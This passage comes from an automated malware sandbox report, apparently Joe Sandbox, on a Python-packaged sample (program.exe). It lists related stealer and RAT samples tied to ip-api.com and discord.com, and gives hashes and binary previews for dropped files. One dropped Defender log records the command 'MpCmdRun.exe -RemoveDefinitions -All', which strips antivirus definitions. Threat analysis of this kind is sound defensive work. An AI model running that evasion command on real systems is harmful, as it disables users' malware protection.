                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        05:22:07API Interceptor165x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                        05:22:07API Interceptor5x Sleep call for process: WMIC.exe modified

                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        208.95.112.1skuld.exeGet hashmaliciousSkuld StealerBrowse
                                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                        SolaraBostrappers.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                        svhost.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                        Midnight.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                        exe030.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                        GRAINS.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                        SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                        RuntimeusererVers.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                        • ip-api.com/json
                                                                                                                                                                                                                        HeilHitler.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                        • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                        akame.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting

                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        discord.comRuntimeusererVers.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                        • 162.159.138.232
                                                                                                                                                                                                                        NEVER OPEN!.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                                                                                                                                                        • 162.159.137.232
                                                                                                                                                                                                                        HeilHitler.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                        • 162.159.128.233
                                                                                                                                                                                                                        file.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                                                                        • 162.159.138.232
                                                                                                                                                                                                                        B78DGDwttv.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                        • 162.159.135.232
                                                                                                                                                                                                                        YDW0S5K7hi.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                        • 162.159.137.232
                                                                                                                                                                                                                        cDRgXaadjD.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                        • 162.159.128.233
                                                                                                                                                                                                                        dens.exeGet hashmaliciousPython Stealer, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                                                        • 162.159.128.233
                                                                                                                                                                                                                        Xyq6rvzLJs.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                        • 162.159.137.232
                                                                                                                                                                                                                        00514DIRyT.exeGet hashmaliciousGO StealerBrowse
                                                                                                                                                                                                                        • 162.159.136.232
                                                                                                                                                                                                                        ip-api.comskuld.exeGet hashmaliciousSkuld StealerBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        SolaraBostrappers.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        svhost.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Midnight.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        exe030.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        GRAINS.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        RuntimeusererVers.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        HeilHitler.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        akame.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                        • 208.95.112.1

                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        CLOUDFLARENETUSskuld.exeGet hashmaliciousSkuld StealerBrowse
                                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.21.25.202
                                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                                        TUT-ASUSskuld.exeGet hashmaliciousSkuld StealerBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        SolaraBostrappers.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        svhost.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        Midnight.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        exe030.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        GRAINS.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        https://t.ly/-kxCOGet hashmaliciousBraodoBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        RuntimeusererVers.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        HeilHitler.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                        • 208.95.112.1

                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll799Ox3XqxO.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                          XODc5nV1kC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            active.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              Creal.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                                                                #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                                                                                                                                                                                                                                  https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                                                                                                                                                                                                                                    B6EGeOHEFm.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                                                                                      Q60ZbERXWZ.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                                                                                        XCubQJqiz7.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                                                                                          MVPloader.exeGet hashmaliciousBlank GrabberBrowse

                                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:@...e...........................................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\ ? ? ? \Display (1).png

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):725710
                                                                                                                                                                                                                                            Entropy (8bit):7.937509403546435
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:xWby7gIV2hUp93yMw1HCiZAbuwADT/3RlqgVjOE9XKXIkgIWG4O55KBM4a3+x:xWO7V/eWAP/RlqajOE9m1gIYO56d
                                                                                                                                                                                                                                            MD5:E3BC08EF28B09FA1C7F2E7641696D22A
                                                                                                                                                                                                                                            SHA1:BD28A2D01A38E77918C258A6269C836D3B675E64
                                                                                                                                                                                                                                            SHA-256:69C00FABE1923F8ADD6FFCF644FEC390CD26F99289CE22050F8BCBDB53252113
                                                                                                                                                                                                                                            SHA-512:671EF5A1BFAE3B5BA36D6AD3CB97144A0E8AEF1D7904FB8E81837064619F3C59431948C19BB60275A78AF3439DCD7A7AAB029A53656BE2CE8D525D92395E2196
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....eU....Oe..v...{..}..m..};.}....[.P..3........P..T....}EE....E..PT..d..:...~.=....}.>.....s.1.Z{.B8.c..h..j.//..6.3b+.......Kq....n..qFL..i|;....[Q|...(.}......<u..[/..7.O.W..h.^).1:._...h..S|...W.].4.=....s.)N..v....S|..ai~..8..oc.........S|...()>..h....r.c}...=..(.yd.4.~.f..GB..P..PG.G.......#`.e5.K{g.#.8tI..].<dd.......A.....G.....QP..o..~.......6.]..}|.{.......-.....D...b...=....;.04w.s...Q3..C..b...0.3w.........'..,J-1.W....'dL.y.1{.;....Dv^.&q....q.i....J&.....*.k...nMh..qa.....a.Nq..o..;../&.{.s.w.5.&.xk..C..>.wb.x.mo..mn...7..V.R.......|../.Sb...N$..h'....-nLs...>..Skc.x=...0a..........s[.O...X.l.0L.6...6.v.Vq..q..n..7.v`.x?[.hn~}(6...1L.:^+..M.My......e.n..%....Y'..?q..R..b.6..o......c`..Mc|.8.Q...5.....cr.m....D.G..Q.w.x.Y...kR....~#..W..v.>L.(.k...XK;y..f.87+.....f..W....OLy.8.....w.c6.~c..C..U)....).\].k1..i..q,&.kN.1.I..5..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MBLSI.zip

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe
                                                                                                                                                                                                                                            File Type:RAR archive data, v5
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):765118
                                                                                                                                                                                                                                            Entropy (8bit):7.999761300170289
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:12288:YxQNugnCHqQ64trFhs6beC4iitMNqSBCC8MinFphIxv/0/aV0EXL6:SGMygbZeC4i5N/CC8MinFeM/80EXL6
                                                                                                                                                                                                                                            MD5:7363E2ADF70AF9E78BF0200030B62056
                                                                                                                                                                                                                                            SHA1:09B7FC624E9BE7B591211A8897CB3948DFC009FA
                                                                                                                                                                                                                                            SHA-256:35205D775A6AD3A8CFD4D1FB6E0BDCB3A0F4984920258DE3484F8E4FEE24248D
                                                                                                                                                                                                                                            SHA-512:A05FA7121C42C467E4CEA931A7379FC78993D488D311BCC0812F2110F4395A9013057AA58F496085D08998186F25D8F98257B10315A248C077E66D042DF71E34
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:Rar!....r..g!.....w@......F.u.......v._...l..T'......F.#IE..V...2%....`.B.zx.O..(.$[{.4..R..S..9.g...%....0..0+..8........~..XsS.Rre...Y.K8].GW...N......L~z.$<ySO ..G.........J^..Xm8.fdn.^...C..j......F.P..X....:f.. .#..._L.[...|.h.../.a=....K.R.F.(..#.5..cy..).x.....+.K.......Zm2t|i.0.P.o*.5..'fZ....R..E.Kh....:L.)....6R........(NX#.l.....!,$p.1...p<.~.(.....Aii...x..y...;...!.3X....pW<..t.l.....'.2...?.... \....>.,.yk..z.2.c.4.\.\6I,8.....{<...../[..H.wn^3c....C..4.$.xM;&.4...h.W<........."{}"..">..Y..L...........o..K..M.r......v....y.O..e?.~9...}..~K;.`.k...I...1.^..zf..L...7.uQ...x..y!........l\\M}........rT..tA<f-...0/eDr..8b|.....,..P.?."......?o-br..KP...|.?...?.u.......M.zO.&.m.....5.......z.T}.P^..8<`..."k....v.M.......,..[@m.2j...{.{..P.{I...fK ...P..7..N.^...^.oFI......sQ;..+..j...QFHev<.G..........)2.)?.w.z_A...3..].....K'..E.{@.e.j........'......+M.S..J........Td..1......K-..(2n.Sz...D3..(............KwW...>3...8...+6.|G.)U..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):894
                                                                                                                                                                                                                                            Entropy (8bit):3.1128058211127683
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Q58KRBubdpkoPAGdjrZ214Zk9+MlWlLehW51IC421YI:QOaqdmOFdjr014++kWResLIs1YI
                                                                                                                                                                                                                                            MD5:842440903277CDCB52B4DF8F4B7687EF
                                                                                                                                                                                                                                            SHA1:7F0F7C418B1078E3AE63541AE06FC54736A32E3B
                                                                                                                                                                                                                                            SHA-256:959B04E1AAC24FAAAB7339C53AFAB478513AA08049B36E398E0B510725F2E22D
                                                                                                                                                                                                                                            SHA-512:83C4E0E633CE1581CC3D0AD49F330FF5A24B9AD7B2FC9ABC08E1A3F83405362FA658FD84D1C6047851EA66013AFBA6817620624B3C63DF0D446913C3BCA76067
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. N.o.v. .. 1.7. .. 2.0.2.4. .0.5.:.2.2.:.2.5.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. N.o.v. .. 1.7. .. 2.0.2.4. .0.5.:.2.2.:.2.5.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RES93BE.tmp

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Nov 17 11:58:08 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1372
                                                                                                                                                                                                                                            Entropy (8bit):4.120789688023344
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:HEFq9UZf3UOUDfHAwKefNqxNII+ycuZhNLRakSyWPNnqS+d:kvBkOSPKCNqu1ulLRa3yqqSe
                                                                                                                                                                                                                                            MD5:04A2EC094D01B7FACC270A1EAAAE9C88
                                                                                                                                                                                                                                            SHA1:3879B908422F1857226D50CE73A448AB478A7527
                                                                                                                                                                                                                                            SHA-256:247DFCA2019DD3DE5917E65F815FD0DD4BA299098FB142BE4184E8B87258C4AD
                                                                                                                                                                                                                                            SHA-512:4082305B54E86CA005CC10119549C7E6CA7A6020CD7C18C42F3FCB271E1BE4DA4A1A82756CC6E2AF47550E0A5B3A9B2015723F59C7CBFE60E1BFA00F69FD5D7E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:L...P.9g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........S....c:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP.................u*_.....2F.]...........4.......C:\Users\user\AppData\Local\Temp\RES93BE.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.g.m.u.p.5.d.5...d.l.l.....(.....L.e.g.a.

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):120400
                                                                                                                                                                                                                                            Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                            MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                            SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                            SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                            SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                            • Filename: 799Ox3XqxO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: XODc5nV1kC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: active.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: Creal.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: B6EGeOHEFm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: Q60ZbERXWZ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: XCubQJqiz7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: MVPloader.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49424
                                                                                                                                                                                                                                            Entropy (8bit):7.815740675307968
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:esvzuaVl+ztlrpqKgHrzwTzjT+KyH9qtztKnb3/+u2xmFepwUIJLV1/DU5YiSyvX:huaugLzUz+lOsnb33lUIJLV1i7SyFB
                                                                                                                                                                                                                                            MD5:58FC4C56F7F400DE210E98CCB8FDC4B2
                                                                                                                                                                                                                                            SHA1:12CB7EC39F3AF0947000295F4B50CBD6E7436554
                                                                                                                                                                                                                                            SHA-256:DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
                                                                                                                                                                                                                                            SHA-512:AD0C6A9A5CA719D244117984A06CCE8E59ED122855E4595DF242DF18509752429389C3A44A8BA0ABC817D61E37F64638CCBDFFC17238D4C38D2364F0A10E6BC7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI73082\_ctypes.pyd

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):64272
                                                                                                                                                                                                                                            Entropy (8bit):7.834005148796091
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:Opx/sXWpBktLQ+ndnJZLIDdwXtRg1zk1+3XTkIJyPeB7SyFmhz:OXsXWpBgLBndJSdIgpk1+3XwIJyPeBrm
                                                                                                                                                                                                                                            MD5:79879C679A12FAC03F472463BB8CEFF7
                                                                                                                                                                                                                                            SHA1:B530763123BD2C537313E5E41477B0ADC0DF3099
                                                                                                                                                                                                                                            SHA-256:8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
                                                                                                                                                                                                                                            SHA-512:CA19DDAEFC9AB7C868DD82008A79EA457ACD71722FEC21C2371D51DCFDB99738E79EFF9B1913A306DBEDACB0540CA84A2EC31DC2267C7B559B6A98B390C5F3A7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI73082\_decimal.pyd

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):120080
                                                                                                                                                                                                                                            Entropy (8bit):7.901857200989369
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:DXHhVKXEI3D7AboLmJ2g+3FAZ9raGHT2PIJvqMkPp5:DX3gEcD/Ksg+3JGHC0kb
                                                                                                                                                                                                                                            MD5:21D27C95493C701DFF0206FF5F03941D
                                                                                                                                                                                                                                            SHA1:F1F124D4B0E3092D28BA4EA4FE8CF601D5BD8600
                                                                                                                                                                                                                                            SHA-256:38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
                                                                                                                                                                                                                                            SHA-512:A5FBDA904024CD097A86D6926E0D593B0F7E69E32DF347A49677818C2F4CD7DC83E2BAB7C2507428328248BD2F54B00F7B2A077C8A0AAD2224071F8221CB9457
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....0...... .....................................................`.....................................................................t+..........\....................................... ...@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pyd

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
